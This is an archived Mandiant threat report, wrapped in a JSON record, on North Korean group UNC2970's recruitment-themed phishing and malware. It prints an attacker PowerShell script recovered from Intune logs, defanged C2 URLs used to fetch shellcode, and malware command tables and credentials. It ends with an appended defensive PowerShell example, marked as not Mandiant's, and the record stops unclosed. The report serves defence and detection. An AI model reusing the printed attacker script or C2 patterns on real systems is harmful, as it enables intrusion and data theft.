{
	"id": "9b940df3-b0b2-4ba7-99cd-dd0346b085dd",
	"created_at": "2026-04-06T00:22:19.773829Z",
	"updated_at": "2026-04-10T03:38:20.450998Z",
	"deleted_at": null,
	"sha1_hash": "2a3132b356393fb5ac433f1b17f2d59aff8341d2",
	"title": "Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970 | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8306611,
	"plain_text": "Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970\r\n| Mandiant\r\nBy Mandiant\r\nPublished: 2023-03-09 · Archived: 2026-04-05 13:21:31 UTC\r\nWritten by: Mandiant Intelligence and Consulting\r\nSince June 2022, Mandiant has been tracking a campaign targeting Western Media and Technology companies\r\nfrom a suspected North Korean espionage group tracked as UNC2970. In June 2022, Mandiant Managed Defense\r\ndetected and responded to an UNC2970 phishing campaign targeting a U.S.-based technology company. During\r\nthis operation, Mandiant observed UNC2970 leverage three new code families: TOUCHMOVE, SIDESHOW, and\r\nTOUCHSHIFT. Mandiant suspects UNC2970 specifically targeted security researchers in this operation.\r\nFollowing the identification of this campaign, Mandiant responded to multiple UNC2970 intrusions targeting U.S.\r\nand European Media organizations through spear-phishing that used a job recruitment theme and demonstrated\r\nadvancements in the group's ability to operate in cloud environments and against Endpoint Detection and\r\nResponse (EDR) tools.\r\nUNC2970 is suspected with high confidence to be UNC577, also known as Temp.Hermit. UNC577 is a cluster of\r\nNorth Korean cyber activity that has been active since at least 2013. The group has significant malware overlaps\r\nwith other North Korean operators and is believed to share resources, such as code and complete malware tools,\r\nwith other distinct actors. 
While observed UNC577 activity primarily targets entities in South Korea, it has also\r\ntargeted other organizations worldwide.\r\nUNC2970 has historically targeted organizations with spear phishing emails containing a job recruitment theme.\r\nThese operations have multiple overlaps with public reporting on “Operation Dream Job” by Google TAG,\r\nProofpoint, and ClearSky.\r\nUNC2970 has recently shifted to targeting users directly on LinkedIn using fake accounts posing as recruiters.\r\nUNC2970 maintains an array of specially crafted LinkedIn accounts based on legitimate users. These accounts are\r\nwell designed and professionally curated to mimic the identities of the legitimate users in order to build rapport\r\nand increase the likelihood of conversation and interaction. UNC2970 uses these accounts to socially engineer\r\ntargets into engaging over WhatsApp, where UNC2970 will then deliver a phishing payload either to a target’s\r\nemail, or directly over WhatsApp. UNC2970 largely employs the PLANKWALK backdoor during phishing\r\noperations as well as other malware families that share code with multiple tools leveraged by UNC577. Mandiant\r\nrecently published a blog post detailing UNC2970 activity that was identified by Mandiant Managed Defense\r\nduring proactive threat hunting. This activity was initially clustered as UNC4034 but has since been merged into\r\nUNC2970 based on multiple infrastructure, tooling, and tactics, techniques, and procedures (TTP) overlaps.\r\nWhen you're done reading this post, don't forget to check out part two on LIGHTSHIFT and LIGHTSHOW.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 1 of 33\n\nSummary\r\nIn June 2022, Mandiant Managed Defense detected and responded to an UNC2970 phishing campaign targeting a\r\nU.S.-based technology company. During this operation, Mandiant observed UNC2970 leverage three new code\r\nfamilies: TOUCHMOVE, SIDESHOW, and TOUCHSHIFT. 
Mandiant suspects UNC2970 specifically targeted\r\nsecurity researchers in this operation. Following the identification of this campaign, Mandiant responded to\r\nmultiple UNC2970 intrusions targeting U.S. and European Media organizations through spear-phishing that used a\r\njob recruitment theme.\r\nInitial Access\r\nWhen conducting phishing operations, UNC2970 engaged with targets initially over LinkedIn masquerading as\r\nrecruiters. Once UNC2970 contacts a target, they would attempt to shift the conversation to WhatsApp, where\r\nthey would continue interacting with their target before sending a phishing payload that masqueraded as a job\r\ndescription. In at least one case, UNC2970 continued interacting with a victim even after the phishing payload\r\nwas executed and detected, asking for screenshots of the detection.\r\nThe phishing payloads primarily utilized by UNC2970 are Microsoft Word documents embedded with macros to\r\nperform remote-template injection to pull down and execute a payload from a remote command and control (C2).\r\nMandiant has observed UNC2970 tailoring the fake job descriptions to specific targets.\r\nFigure 1: UNC2970 lure document\r\nThe C2 servers utilized by UNC2970 for remote template injection have primarily been compromised WordPress\r\nsites, a trend observed in other UNC2970 code families as well as those used by other DPRK groups. At the time\r\nof analysis, the remote template was no longer present on the C2; however, following this phishing activity,\r\nMandiant identified it beaconing to a C2 associated with PLANKWALK.\r\nIn the most recent UNC2970 investigation, Mandiant observed the group returning to WhatsApp to engage their\r\ntargets. 
This activity overlaps with a recent blog post by MSTIC on operations from ZINC, as well as the\r\npreviously mentioned Mandiant blog post from July 2022.\r\nThe ZIP file delivered by UNC2970 contained what the victim thought was a skills assessment test for a job\r\napplication. In reality, the ZIP contained an ISO file, which included a trojanized version of TightVNC that\r\nMandiant tracks as LIDSHIFT. The victim was instructed to run the TightVNC application which, along with the\r\nother files, is named appropriately for the company the victim had planned to take the assessment for.\r\nIn addition to functioning as a legitimate TightVNC viewer, LIDSHIFT contained multiple hidden features. The\r\nfirst was that upon execution by the user, the malware would send a beacon back to its hardcoded C2; the only\r\ninteraction this needed from the user was the launching of the program. This lack of interaction differs from what\r\nMSTIC observed in their recent blog post. The initial C2 beacon from LIDSHIFT contains the victim’s initial\r\nusername and hostname.\r\nLIDSHIFT’s second capability is to reflectively inject an encrypted DLL into memory. The injected DLL is a\r\ntrojanized Notepad++ plugin that functions as a downloader, which Mandiant tracks as LIDSHOT. LIDSHOT is\r\ninjected as soon as the victim opens the drop down inside of the TightVNC Viewer application. LIDSHOT has two\r\nprimary functions: system enumeration and downloading and executing shellcode from the C2.\r\nLIDSHOT sends the following information back to its C2:\r\nComputer Name\r\nProduct name as recorded in the registry key SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\ProductName\r\nIP address\r\nProcess List with User and Session ID associated per process\r\nEstablish Foothold\r\nIn multiple investigations, Mandiant has observed UNC2970 deploy PLANKWALK to establish footholds within\r\nenvironments. 
PLANKWALK is a backdoor written in C++ that communicates over HTTP and utilizes multiple\r\nlayers of DLL sideloading to execute an encrypted payload. PLANKWALK is initially executed through a\r\nlauncher that will import and execute a second stage launcher expected to be on disk.\r\nObserved First Stage Launcher names:\r\ndestextapi.dll\r\nmanextapi.dll\r\npathextapi.dll\r\npreextapi.dll\r\nWbemcomn.dll\r\nOnce loaded and executed, the secondary launcher will attempt to decrypt and execute an encrypted\r\nPLANKWALK sample on disk that matches the following pattern:\r\nC:\\ProgramData\\Microsoft\\Vault\\cache\u003cthree numerical digits\u003e.db\r\nOnce executed, PLANKWALK will decrypt an on-host encrypted configuration file that contains the C2 for the\r\nbackdoor. The C2 infrastructure for PLANKWALK has largely consisted of co-opted legitimate WordPress sites.\r\nFollowing the deployment of PLANKWALK, Mandiant observed UNC2970 leverage a wide variety of additional\r\ntooling, including Microsoft Intune to deploy a shellcode downloader.\r\nTool Time: Kim “The Toolman” Taylor\r\nDuring their operations, Mandiant has observed UNC2970 use a wide range of custom, post-exploitation tooling\r\nto achieve their goals. One of UNC2970's go-to tools has been a dropper tracked as TOUCHSHIFT.\r\nTOUCHSHIFT allows UNC2970 to employ follow-on tooling that ranges from keyloggers and screenshot utilities\r\nto full featured backdoors.\r\nTOUCHSHIFT\r\nTOUCHSHIFT is a malicious dropper that masquerades as mscoree.dll or netplwix.dll. TOUCHSHIFT is\r\ntypically created in the same directory, and at the same time, as a legitimate copy of a Windows binary.\r\nTOUCHSHIFT leverages DLL Search Order Hijacking to use the legitimate file to load and execute itself.\r\nTOUCHSHIFT has been observed containing one or two payloads which it executes in-memory. 
Payloads\r\nthat have been seen include TOUCHSHOT, TOUCHKEY, HOOKSHOT, TOUCHMOVE, and SIDESHOW.\r\nTo appear legitimate, the file uses over 100 exports that match common system export names. However, the\r\nmajority point to the same empty function. The malicious code has been seen located in the exports\r\nLockClrVersion or UsersRunDllW in different instances.\r\nFigure 2: Malicious export alongside several of the dummy exports\r\nWhen TOUCHSHIFT contains a second payload, it takes a single character command line option as its first\r\nargument to determine which of the two payloads to execute.\r\nFigure 3: Checking command line options\r\nTo unpack its payload(s), TOUCHSHIFT generates a decryption key by XOR encoding its second argument and\r\nthe first 16 characters of the legitimate executable’s file name.\r\nFor example, in one instance Mandiant observed the arguments -CortanaUIFilter, XOR encoded with the\r\nhardcoded key 009WAYHb90687PXkS, and printfilterpipel, which was XOR encoded with the hardcoded key\r\n.sV%58\u0026.lypQ[$= and was loaded by the file printfilterpipelinesvc.exe. In another instance, the argument\r\nused was --forkavlauncher and the loading file was C:\\windows\\Branding\\Netplwiz.exe.\r\nOnce the code is unpacked, it is then loaded into a memory location created by a call to VirtualAlloc and\r\nexecuted from there.\r\nFigure 4: Beginning of unpacked payload in memory\r\nOnce the payload(s) have been executed, the main portion of TOUCHSHIFT will sleep for a period of time\r\nallowing the payload(s) to continue executing.\r\nTOUCHSHIFT-ing into Gear — Follow on payloads\r\nTOUCHSHOT\r\nTOUCHSHOT takes screenshots of the system on which it is running and saves them to a file to be retrieved by\r\nthe threat actor at a later time. 
TOUCHSHOT is configured to take a screenshot every three seconds, and then uses\r\nZLIB to compress the images. The compressed data is then appended to a file that it creates and continues\r\nappending new screenshots to this file until the file reaches five megabytes in size, at which point it will create a\r\nnew file with the same naming convention. TOUCHSHOT was seen embedded in the same instance of\r\nTOUCHSHIFT as TOUCHKEY (discussed later in the post).\r\nTOUCHSHOT will create a file in the C:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\r\ndirectory, and will name the file ~DM{####}P.dat, where the four numbers are pseudo-randomly generated. Once\r\nTOUCHSHOT has generated the file name, it attempts to create a handle to the file. If the return value indicates\r\nthat the file does not exist, it will then create the file. This check is performed as part of a loop that continues until\r\na new file needs to be created. After each iteration of the loop, TOUCHSHOT will then take a screenshot, which is\r\nappended to the staging file.\r\nFigure 5: Generation of the directory path\r\nFigure 6: Generation of file name with pseudo-random numbers\r\nFigure 7: Creating a handle to the file or creating it\r\nFigure 8: Taking a screenshot\r\nTOUCHKEY\r\nTOUCHKEY is a keylogger that captures keystrokes and clipboard data, both of which are encoded with a single-byte XOR and saved to a file. 
As with TOUCHSHOT, these files need to be acquired by the threat actor through\r\nadditional means.\r\nFigure 9: XOR’ing data with byte 0x62 before writing to the staging file\r\nTOUCHKEY creates two files in the C:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ directory. The file name Normal.dost is used for\r\nstoring the captured keystrokes, while the file name Normal.docb is used for the clipboard data. The full paths\r\nare then passed into their own thread, where the keystrokes or clipboard data will be captured and appended to\r\ntheir respective files.\r\nFigure 10: Path generation for the staging files\r\nFigure 11: Adding file names to the full path and creating the threads\r\nIn one of the created threads, TOUCHKEY will open the clipboard and grab the data that is stored within it. In the\r\nother thread, TOUCHKEY will set a hook into the keyboard, and record any keys that are pressed.\r\nFigure 12: Capturing the clipboard data\r\nFigure 13: Capturing keystrokes\r\nHOOKSHOT\r\nHOOKSHOT is a tunneler that leverages a statically linked implementation of OpenSSL to communicate back to\r\nits C2. 
While it connects over TCP, it does not make use of a client certificate for encryption.\r\nFigure 14: Example of OpenSSL statically linked in the file\r\nHOOKSHOT takes an encoded argument containing two IP and port pairs, which it will leverage for\r\ncommunicating with its C2.\r\nFigure 15: Separating IPs and ports\r\nHOOKSHOT will then create a socket using these two IP addresses, and tunnel traffic across them utilizing\r\nTLSv1.0.\r\nFigure 16: Socket creation\r\nTOUCHMOVE\r\nTOUCHMOVE is a loader that decrypts a configuration file and a payload, both of which must be on disk, and\r\nthen executes the payload. TOUCHMOVE generates an RC6 key to decrypt the two files by querying the system’s\r\nBIOS date, version, manufacturer, and product name. Once decrypted, the results are XOR encoded with a\r\nhardcoded key. If the generated RC6 key is incorrect, the configuration and payload files will not successfully\r\ndecrypt, indicating that UNC2970 compiles instances of TOUCHMOVE after having already conducted\r\nreconnaissance on the target victim system. Once the RC6 key is successfully generated, a handle is created to the\r\nconfiguration file, and the decryption process is conducted. If the configuration file is successfully decrypted, the\r\npayload’s full path is located within it, and the same decryption process then occurs on the payload. 
Following\r\nthis, the payload is executed.\r\nFigure 17: BIOS query strings\r\nFigure 18: Creating a handle to the configuration file\r\nFigure 19: Creating a handle to the payload\r\nSIDESHOW\r\nSIDESHOW is a backdoor written in C/C++ that communicates via HTTP POST requests with its C2 server. The\r\nbackdoor is multi-threaded, uses RC6 encryption, and supports at least 49 commands, which can be seen in Table\r\n1. Capabilities include arbitrary command execution (WMI capable); payload execution via process injection;\r\nservice, registry, scheduled task, and firewall manipulation; querying and updating Domain Controller settings;\r\ncreating password protected ZIP files; and more. SIDESHOW does not explicitly establish persistence; however,\r\nbased on the multitude of supported commands it may be commanded to establish persistence.\r\nSIDESHOW derives a system-specific RC6 key using the same registry values as TOUCHMOVE and uses the\r\ngenerated key to decrypt the same configuration file from disk that TOUCHMOVE decrypted. The decrypted\r\nconfiguration file contains a list of C2 URLs to which SIDESHOW communicates using HTTP POST requests.\r\nSIDESHOW iterates this C2 URL list and attempts to authenticate to each C2 URL until it is successful. Once\r\nsuccessful, SIDESHOW enters a state of command processing and sends additional HTTP POST requests to\r\nretrieve commands. 
SIDESHOW attempts to use the system's default HTTP User-Agent string during C2\r\ncommunications; however, if not available it uses the hard-coded HTTP User-Agent string:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69\r\nWhen communicating to its C2 server via HTTP POST requests, SIDESHOW forms a URI parameter string\r\nconsisting of a mix of randomly selected and hard-coded URI parameters.\r\nAuthentication requests use the following URI parameter string format:\r\n\u003cparam_1\u003e=\u003chex_seed\u003e\u0026\u003cparam_2\u003e=pAJ9dk4OVq85jxKWoNfw1AG2C\u0026\u003cparam_3\u003e=\u003c16_random_hex_chars\u003e\r\nThe first URI parameter value comes from SIDESHOW’s configuration and is used to seed the random function.\r\nThe second URI parameter value, pAJ9dk4OVq85jxKWoNfw1AG2C, is hardcoded and likely an authentication\r\ncredential.\r\nThe third URI parameter value, \u003c16_random_hex_chars\u003e, is a session identifier (\u003csession_id\u003e) used for future\r\ncommunications and consists of two subcomponents:\r\n1. \u003c8_random_hex_based_on_seed\u003e\r\n2. 
\u003c8_random_hex_based_on_tickcount\u003e\r\nThe first URI parameter's value, \u003chex_seed\u003e, is used as a random seed value to derive the first eight hexadecimal\r\ncharacters (\u003c8_random_hex_based_on_seed\u003e), whereas the last eight hexadecimal characters\r\n(\u003c8_random_hex_based_on_tickcount\u003e) are derived using the CPU's current tick count as the random seed value.\r\nThis results in the value \u003c8_random_hex_based_on_seed\u003e being deterministic, while\r\n\u003c8_random_hex_based_on_tickcount\u003e is pseudo-random.\r\nThe following is an example authentication URI parameter string:\r\npguid=A59\u0026ssln=pAJ9dk4OVq85jxKWoNfw1AG2C\u0026cup2key=184B280E341AE63F\r\nFigure 20: Building of URI parameter string\r\nSIDESHOW parses the response and considers it a successful authentication if it contains the string \u003c!DOCTYPE html\u003e.\r\nCommand requests use the following URI parameter string format (notice that \u003cparam_2\u003e and \u003cparam_3\u003e\r\nhave switched locations in the string):\r\n\u003cparam_1\u003e=\u003c5_random_digits\u003e\u0026\u003cparam_3\u003e=2\u003csession_id\u003e\u0026\u003cparam_2\u003e=\u003c6_random_digits\u003e\r\nExample command URI parameter string:\r\nother=37685\u0026session=2184B280E341AE63F\u0026page=593881\r\nSIDESHOW parses the command response body and extracts data following the string \u003c!DOCTYPE html\u003e.\r\nSIDESHOW then appears to Base64 decode and RC6 decrypt the extracted data. 
SIDESHOW responds to the\r\ncommands listed in Table 1 (commands are described on a best effort basis).\r\nFigure 21: Switch statement following parsing of command\r\nCommand ID  Description\r\n00 Get lightweight system information and a few configuration details\r\n01 Enumerate drives and list free space\r\n02 List files in directory\r\n03 Execute arbitrary command via CreateProcess() and return output\r\n04 Likely zip directory to create password protected ZIP file with password AtbsxjCiD2axc*ic[3\u003c/8Ad81!G./1kiThAfkgnw\r\n05 Download file to system\r\n06 Execute process\r\n07 Execute process and spoof parent process identifier (PID)\r\n08 Execute PE payload via process injection for specified PID\r\n09 Execute PE payload via loading into malware's memory space\r\n0A List running processes and loaded DLLs\r\n0B Terminate process\r\n0C Securely delete a file by first writing random data and then calling DeleteFile()\r\n0D Connect to specified IP address and port -- usage unknown\r\n0E Not implemented\r\n0F Set current directory\r\n10 Timestomp a file using another file's timestamp\r\n11 Update beacon interval\r\n12 Update beacon interval and save configuration to disk\r\n13 Clean up by securely deleting supporting files, registry values, services, and exit\r\n14 Load configuration from disk\r\n15 Update configuration and save to disk\r\n16 Get size of all files in a directory\r\n17 Get specified drive's free disk space\r\n18 Suspend a process\r\n19 Suspend a process\r\n1A Load DLL in another process\r\n1B Unload DLL in another process\r\n1C Copy file to another location\r\n1D Remove directory\r\n1E Move file to another location\r\n1F Execute shellcode payload via process injection for specified 
PID\r\n20 Execute shellcode payload via loading into malware's memory space\r\n21 Get networking configuration information\r\n22 Query or modify settings on a Windows Domain Controller\r\n23 Query or modify system's firewall settings\r\n24 List active TCP and UDP connections\r\n25 Ping a remote system via ICMP requests -- usage unknown\r\n26 Query or modify system's registry\r\n27 Query or modify system's services\r\n28 Ping a remote system via ICMP requests -- usage unknown\r\n29 Get domain and user account name under which the malware's process is running\r\n2A Execute WMI command\r\n2B Resolve domain name via DNS query\r\n2C Query or modify system's scheduled tasks\r\n2D Get heavyweight system information\r\n2E Get networking interface information\r\n2F Create directory\r\n30 List files in directory\r\nTable 1: Commands supported by SIDESHOW\r\nReaching for the Clouds: Intune with CLOUDBURST\r\nIn at least one investigation, Mandiant identified the threat actors leveraging Microsoft Intune, Microsoft's\r\nendpoint management solution, to deploy malware to hosts in the environment. Mandiant suspects that this\r\nmethod of malware deployment was used due to the absence of a VPN solution for remote machines. In order to\r\nremotely execute code, the attackers leveraged the Microsoft Intune management extension (IME) to upload\r\ncustom PowerShell scripts containing malicious code to various hosts in the client environment. 
While conducting\r\nforensic analysis on a host, Mandiant identified the following Microsoft IME related PowerShell script command\r\nline arguments:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -executionPolicy bypass -file \"C:\\Program Files (x86)\\Microsoft Intune Management Extension\\Policies\\Scripts\\42fb3cca-48dd-4412-a11a-245384544402_f391eded-82d3-4506-8bf4-9213f6f4d586.ps1\r\nAt the time of analysis, Mandiant was unable to acquire the PS1 file itself; however, Mandiant was able to acquire\r\na full copy of the PS1 file from local Microsoft IME logs identified on a host, located at:\r\nC:\\ProgramData\\Microsoft\\IntuneManagementExtension\\Logs\\IntuneManagementExtension-YYYYMMDD-HHMMSS.log\r\nThe entry in the local logs appeared as follows:\r\n\u003c![LOG[[PowerShell] response payload is [{\"AccountId\":\"[userGUID]\",\"PolicyId\":\"f391eded-82d3-4506-8bf4-9213f6f4d586\",\"PolicyType\":1,\"DocumentSchemaVersion\":\"1.0\",\"PolicyHash\":\"P23cVfMyHLECSGPt1T6YYcoxhCLWKS05jX5MukC3MIw=\",\"PolicyBody\":\"$EnModule = \\\"[Base64_encoded_CLOUDBURST_payload]\"\\r\\n$DeModule = [System.Convert]::FromBase64CharArray($EnModule, 0, $EnModule.Length)\\r\\nSet-Content \\\"C:\\\\ProgramData\\\\mscoree.dll\\\" -Value $DeModule -Encoding Byte\\r\\nCopy-Item \\\"C:\\\\Windows\\\\System32\\\\PresentationHost.exe\\\" -Destination \\\"C:\\\\ProgramData\\\"\\r\\nStart-Process -NoNewWindow -FilePath \\\"C:\\\\ProgramData\\\\PresentationHost.exe\\\" -ArgumentList 
\\\"-embeddingObject\\\"\\r\\n\",\"PolicyBodySize\":null,\"PolicyScriptParameters\":null,\"ContentSignature\":\"[Base64_encoded_signing_certificate]\",\"isTombStoned\":false,\"isRecurring\":false,\"isFullSync\":false,\"ExecutionCont\r\n\"InternalVersion\":1,\"EnforceSignatureCheck\":false,\"RunningMode\":1,\"RemediationScript\":null,\"RunRemediation\":fals\r\nRemediateScriptHash\":null,\"RemediationScriptParameters\":null,\"ComplianceRules\":null,\"ExecutionFrequency\":0,\"\r\nRetryCount\":0,\"BlockExecutionNotifications\":false,\"ModifiedTime\":null,\"Schedule\":null,\"IsFirstPartyScript\":false\r\n\"ScriptApplicabilityStateDueToAssignmentFilters\":null,\"AssignmentFilterIdToEvalStateMap\":{},\"HardwareConfigurati\r\nThe malicious PowerShell script was used to decode the Base64 encoded CLOUDBURST payload and drop it on\r\ndisk as C:\\ProgramData\\mscoree.dll. The script would then write a copy\r\nof C:\\Windows\\System32\\PresentationHost.exe to C:\\ProgramData and execute it with the argument -embeddingObject. PresentationHost.exe is a legitimate Windows binary used by UNC2970 to sideload\r\nCLOUDBURST.\r\nUpon execution, PresentationHost.exe would load the CLOUDBURST payload into memory. Upon further\r\nanalysis of the Microsoft IME endpoint logs, Mandiant identified a unique GUID, f391eded-82d3-4506-8bf4-9213f6f4d586, in the PolicyID field, which is a \"Unique identifier of the Policy in the data warehouse\". The\r\nIntune Data Warehouse provides insight and information about an enterprise mobile environment, such as\r\nhistorical Intune data and Intune data refreshed on a daily occurrence. The identified GUID also matched the GUID\r\nof the PowerShell script file name and the GUID observed in an IME associated registry key.\r\nWhen reviewing the Intune Tenant admin Audit logs, Mandiant identified the same GUID under the ObjectID\r\nfield. 
The Intune Tenant audit logs show records of activities that generate a change in Intune, including create,\r\nupdate (edit), delete, assign, and remote actions. The logs revealed that the threat actors used a previously\r\ncompromised account to perform a create, assign, patch, and finally a delete action of a Device Management\r\nScript, using the Target Microsoft.Management.Services.Api.DeviceManagementScript and the\r\nGroupID f391eded-82d3-4506-8bf4-9213f6f4d586.\r\nFurther analysis revealed that ObjectID GUIDs referenced in the Intune Tenant admin Audit logs map to the ID\r\nof Mobile App assignment groups.\r\nAt the time of analysis, the GroupID f391eded-82d3-4506-8bf4-9213f6f4d586 was no longer present in the\r\nIntune Endpoint management admin center, and was likely deleted by the threat actors.\r\nIn order to determine malicious usage of Microsoft Intune, Mandiant performed the following analysis steps:\r\n1. Analyzed Azure AD sign-in logs for evidence of suspicious logons to the Microsoft Intune application\r\n2. Analyzed Microsoft Intune audit logs for evidence of unexpected deployments and performed the following:\r\n   1. Utilized the GroupID GUID to search for the presence of the following endpoint artifacts:\r\n      1. HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IntuneManagementExtension\\Policies\\\u003cUserGUID\u003e\\\u003csuspicious ObjectID GUID\u003e\r\n      2. C:\\Program Files (x86)\\Microsoft Intune Management Extension\\Policies\\Scripts\\\u003cUserGUID\u003e_\u003csuspicious ObjectID GUID\u003e.ps1\r\n   2. For hosts that had the aforementioned artifacts, the following was performed:\r\n      Acquired the PS1 file(s) and analyzed for malicious code\r\n      Performed traditional endpoint analysis\r\nMandiant tracks the malware being distributed via Intune as CLOUDBURST. CLOUDBURST is a downloader\r\nwritten in C that communicates via HTTP. 
The malware attempts to make itself look like a legitimate version\r\nof mscoree.dll, but contains fake exports, the same way that TOUCHSHIFT uses fake exports. One variant of\r\nCLOUDBURST made use of legitimate open-source software that was added as exports, in addition to the fake\r\nexports. The actual export with malicious code is CorExitProcess. The CorExitProcess export expects the\r\nsingle argument -embeddingObject.\r\nFigure 22: Comparing command line argument with -embeddingObject\r\nOnce the aforementioned command line argument has been verified, CLOUDBURST builds the domain as a stack\r\nstring, and sends out the following two requests to the C2 server:\r\nhxxps://[c2domain]/wp-content/plugins/contact.php?gametype=\u003crandom_dword\u003e\u0026type=O8Akm8aV09Nw412KMoWJd\r\nhxxps://[c2domain]/wp-content/plugins/contact.php?gametype=tennis\u0026type=k\u003crandom_dword\u003e\r\nFollowing the network connections, CLOUDBURST conducts a host survey, in which it will determine the\r\nProduct Name, Computer Name, and enumerate running processes.\r\nFigure 23: Calling functions to enumerate the host\r\nUpon completion of the host enumeration, CLOUDBURST then downloads and executes shellcode from the C2\r\nserver. At this time, Mandiant was unable to recover and identify the purpose of the shellcode downloaded by\r\nCLOUDBURST.\r\nFigure 24: Allocating and populating memory space, and executing the shellcode\r\nOutlook and Implications\r\nThe identified malware tools highlight continued malware development and deployment of new tools by\r\nUNC2970. Although the group has previously targeted defense, media, and technology industries, the targeting of\r\nsecurity researchers suggests a shift in strategy or an expansion of its operations. 
Technical indicators and the\r\ngroup’s TTPs link it to TEMP.Hermit, although this latest activity suggests the group is adapting its capabilities\r\nas more of its targets move to cloud services. To learn more about how UNC2970 further enabled its operations,\r\nplease see part two of our research.\r\nCampaign Tracking\r\nMandiant will continue to monitor UNC2970’s campaigns and intrusion operations and will provide notable and\r\ndynamic updates regarding changes in tactics and techniques, the introduction of tools with new capabilities, or\r\nthe use of new infrastructure to carry out their mission.\r\nFor more insights into how Mandiant tracks this and similar campaigns, see our Threat Campaigns feature\r\nwithin Mandiant Advantage Threat Intelligence.\r\nRecommended Mitigations\r\nHardening Azure AD and Microsoft Intune\r\nMandiant has observed UNC2970 leverage weak identity controls in Azure AD combined with Microsoft Intune’s\r\nendpoint management capabilities to effectively deploy malicious PowerShell scripts onto unsuspecting endpoints.\r\nIncreasing Azure AD identity protections and limiting access to Microsoft Intune is essential in mitigating the\r\nattacker activity observed by Mandiant. Organizations should consider implementing the following hardening\r\ncontrols:\r\nCloud-Only Accounts: Organizations should utilize cloud-only accounts for privileged access within Azure AD\r\n(e.g., Global Admins, Intune Administrator) and never assign privileged access to synced accounts from on-premises identity providers such as Active Directory. Additionally, admins should utilize a separate “daily-driver”\r\naccount for day-to-day activities such as sending email or web-browsing. 
Dedicated admin accounts should be used to carry out administrative functions only.\r\nEnforce Strong Multi-Factor Authentication Methods: Organizations should consider enforcing enhanced and phishing-resistant Multi-Factor Authentication (MFA) methods for all users and administrators. Weak MFA methods commonly include SMS, voice (phone call), OTPs, and push notifications, and should be considered for removal. MFA enhancements for non-privileged users should include contextual information about the MFA request, such as number matching, application name, and geographic location. For privileged accounts, Mandiant recommends enforcing hardware tokens or FIDO2 security keys as well as requiring MFA on every sign-in regardless of location (e.g., trusted network, corporate VPN). As an initial roll-out of enhanced MFA methods, organizations should focus on all accounts with administrative privileges in Azure AD. Microsoft has additional information regarding contextual MFA settings.\r\nPrivileged Identity Management (PIM) Solution: Mandiant recommends that organizations consider using a PIM solution. A PIM solution should include a Just-In-Time (JIT) access capability that provides access when requested, for a specific duration of time, and initiates an approval flow before granting an account a highly privileged role (e.g., Global Administrator or Intune Administrator).\r\nConditional Access Policies (CAPs) to Enforce Security Restrictions in Azure AD: A CAP allows organizations to set requirements for accessing cloud apps such as Intune, based on various conditions including location and device platform. Mandiant recommends that organizations use CAPs to restrict Azure administrative functions to compliant, Azure AD-registered devices only, and only from a specific subset of trusted IPs or ranges. 
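The admin-role restrictions described above (compliant device plus phishing-resistant MFA on every sign-in, and a trusted-IP restriction) expressed as Microsoft Graph request bodies, as an added PowerShell example that is not part of the Mandiant post. It uses the Microsoft.Graph PowerShell SDK cmdlets Connect-MgGraph, New-MgIdentityConditionalAccessNamedLocation and New-MgIdentityConditionalAccessPolicy; the role template IDs and the built-in authentication-strength ID are Microsoft's fixed values, while the policy names, the 203.0.113.0/24 egress range and the break-glass account placeholder are assumptions to replace. Without -Apply it only prints the bodies, so it runs offline:

```powershell
# Added example (not Mandiant's code): Conditional Access for privileged Azure AD roles.
# Role template IDs and the built-in authentication-strength ID are Microsoft's fixed values;
# the break-glass object ID and the egress range are placeholders (assumptions) to replace.
$GlobalAdminRole = '62e90394-69f5-4237-9190-012177145e10'   # Global Administrator role template
$IntuneAdminRole = '3a2c62db-5318-420d-8d74-23affee5d9d5'   # Intune Administrator role template
$PhishResistMfa  = '00000000-0000-0000-0000-000000000004'   # built-in Phishing-resistant MFA strength
$BreakGlassUser  = 'REPLACE-WITH-BREAK-GLASS-ACCOUNT-OBJECT-ID' # always excluded so a bad policy cannot lock you out
$TrustedCidr     = '203.0.113.0/24'                            # assumed egress range of the admin jump hosts
$AdminRoles      = @($GlobalAdminRole, $IntuneAdminRole)

function New-TrustedLocationBody {
    # IP named location; isTrusted keeps Identity Protection from scoring admin sign-ins as unfamiliar.
    @{
        '@odata.type' = '#microsoft.graph.ipNamedLocation'
        displayName   = 'Admin egress (trusted)'
        isTrusted     = $true
        ipRanges      = @(@{ '@odata.type' = '#microsoft.graph.iPv4CidrRange'; cidrAddress = $TrustedCidr })
    }
}

function New-AdminDevicePolicyBody {
    # Policy 1: privileged roles only from a compliant device, only with phishing-resistant MFA,
    # and re-prompted on every sign-in regardless of location (no trusted-network exemption).
    @{
        displayName   = 'CA-ADM-01 Admins: compliant device + phishing-resistant MFA every sign-in'
        state         = 'enabledForReportingButNotEnforced'   # report-only first; enable after reviewing sign-in logs
        conditions    = @{
            users        = @{ includeRoles = $AdminRoles; excludeUsers = @($BreakGlassUser) }
            applications = @{ includeApplications = @('All') }
        }
        grantControls = @{
            operator               = 'AND'
            builtInControls        = @('compliantDevice')
            authenticationStrength = @{ id = $PhishResistMfa }
        }
        sessionControls = @{
            signInFrequency = @{ isEnabled = $true; frequencyInterval = 'everyTime'; authenticationType = 'primaryAndSecondaryAuthentication' }
        }
    }
}

function New-AdminLocationBlockPolicyBody {
    param([Parameter(Mandatory)][string]$TrustedLocationId)
    # Policy 2: the same roles are blocked from every location except the trusted one.
    @{
        displayName   = 'CA-ADM-02 Admins: block outside trusted egress'
        state         = 'enabledForReportingButNotEnforced'
        conditions    = @{
            users        = @{ includeRoles = $AdminRoles; excludeUsers = @($BreakGlassUser) }
            applications = @{ includeApplications = @('All') }
            locations    = @{ includeLocations = @('All'); excludeLocations = @($TrustedLocationId) }
        }
        grantControls = @{ operator = 'OR'; builtInControls = @('block') }
    }
}

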